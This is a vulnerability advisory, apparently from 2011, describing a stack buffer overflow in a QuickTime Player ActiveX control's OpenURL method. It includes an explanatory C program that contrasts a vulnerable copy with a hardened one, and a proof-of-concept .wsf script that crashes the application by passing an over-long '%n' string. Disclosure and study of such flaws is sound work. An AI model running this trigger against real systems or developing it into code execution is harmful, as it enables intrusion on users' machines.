Author(s): Ivan Sanchez & Hernan Hegykozi
Contact Us: security@evilcode.com.ar
Versions: QuickTimePlayer_7.6.9
Date: 06/09/2011
Product: QuickTimePlayer_7.6.9
Vendor Notified: 2 months ago (Apple Inc / bugreport.apple.com)
Problem ID: 9753778
We have discovered that "QuickTimePlayer_7.6.9" contains a buffer overflow in its ActiveX control: passing a specially crafted string to the control crashes the application.
Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of QuickTime Player through its QuickTimePlayer.dll ActiveX control. User interaction is required: the target must visit a malicious page or open a malicious file. The flaw exists because QuickTimePlayer.dll explicitly trusts a length embedded in the input it processes when calculating the size of a buffer. The application then copies an arbitrarily long string into a fixed-size buffer on the stack. The resulting stack-based overflow can lead to code execution in the context of the application.
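The following C program is an added illustration of the flaw class described above; it is not code from the advisory or from Apple. It models a fixed 64-byte stack buffer followed by a 4-byte marker that stands in for the saved return address, and compares the vulnerable pattern (the copy length is taken from the input and never compared with the buffer size) with a hardened version that rejects over-long input before copying. The buffer size, the marker value and the 72-byte "%n" payload (modeled on the PoC string) are all assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated stack frame: a fixed URL buffer, then a 4-byte marker that
 * plays the role of the saved return address. Sizes are assumptions. */
#define URL_BUF_SIZE 64
#define FRAME_SIZE   (URL_BUF_SIZE + 4)
#define MARKER       0xDEADC0DEu

/* Constructed payload modeled on the PoC: 36 x "%n" = 72 bytes. */
#define NN8 "%n%n%n%n%n%n%n%n"
static const char poc_payload[] = NN8 NN8 NN8 NN8 "%n%n%n%n";
#define POC_LEN ((uint32_t)(sizeof poc_payload - 1))

/* Place the marker just past the URL buffer inside the simulated frame. */
static void init_frame(unsigned char *frame) {
    uint32_t marker = MARKER;
    memset(frame, 0, FRAME_SIZE);
    memcpy(frame + URL_BUF_SIZE, &marker, sizeof marker);
}

/* 1 if the marker after the buffer survived, 0 if the copy overwrote it. */
static int marker_intact(const unsigned char *frame) {
    uint32_t m;
    memcpy(&m, frame + URL_BUF_SIZE, sizeof m);
    return m == MARKER;
}

/* Vulnerable pattern: declared_len comes from the input and is trusted.
 * The only clamp is to FRAME_SIZE, so the demonstration cannot corrupt
 * memory outside the simulated frame; it still overruns the URL buffer.
 * Returns 1 if the marker survived, 0 if it was overwritten. */
int open_url_vulnerable(const char *data, uint32_t declared_len) {
    unsigned char frame[FRAME_SIZE];
    size_t n = declared_len;
    init_frame(frame);
    if (n > FRAME_SIZE) n = FRAME_SIZE;   /* demo guard only, not a fix */
    memcpy(frame, data, n);               /* never compared with URL_BUF_SIZE */
    return marker_intact(frame);
}

/* Hardened version: the claimed length is validated against the destination
 * before any copy; a real parser must also bound it by the bytes actually
 * present in the input. Returns -1 when the input is rejected, else 1. */
int open_url_hardened(const char *data, uint32_t declared_len) {
    unsigned char frame[FRAME_SIZE];
    init_frame(frame);
    if (declared_len >= URL_BUF_SIZE)     /* leave room for the terminator */
        return -1;
    memcpy(frame, data, declared_len);
    frame[declared_len] = '\0';
    return marker_intact(frame);
}

int main(void) {
    const char *benign = "http://example.com/x";
    uint32_t benign_len = (uint32_t)strlen(benign);

    printf("benign  vulnerable=%d hardened=%d\n",
           open_url_vulnerable(benign, benign_len),
           open_url_hardened(benign, benign_len));
    printf("poc     vulnerable=%d hardened=%d\n",
           open_url_vulnerable(poc_payload, POC_LEN),
           open_url_hardened(poc_payload, POC_LEN));
    return 0;
}
```

With the 72-byte payload the vulnerable copy reaches past the 64-byte buffer and replaces the marker, which is exactly what would clobber a saved return address on a real stack; the hardened version refuses the input before touching the frame.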

POC:
1-Open QuickTime Player.
2-Save the following code as crashapp.wsf and run it:
crashapp.wsf
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3' id='target' />
<script language='vbscript'>
' Variables recording the target library and method; only the OpenURL call below is needed to trigger the crash.
targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll"
prototype = "Sub OpenURL ( ByVal url As String )"
memberName = "OpenURL"
progid = "QuickTimePlayerLib.QuickTimePlayer"
argCount = 1
' A long run of "%n": the string is longer than the fixed-size stack buffer.
arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
target.OpenURL arg1
</script>
</job>
</package>
3-The application will crash.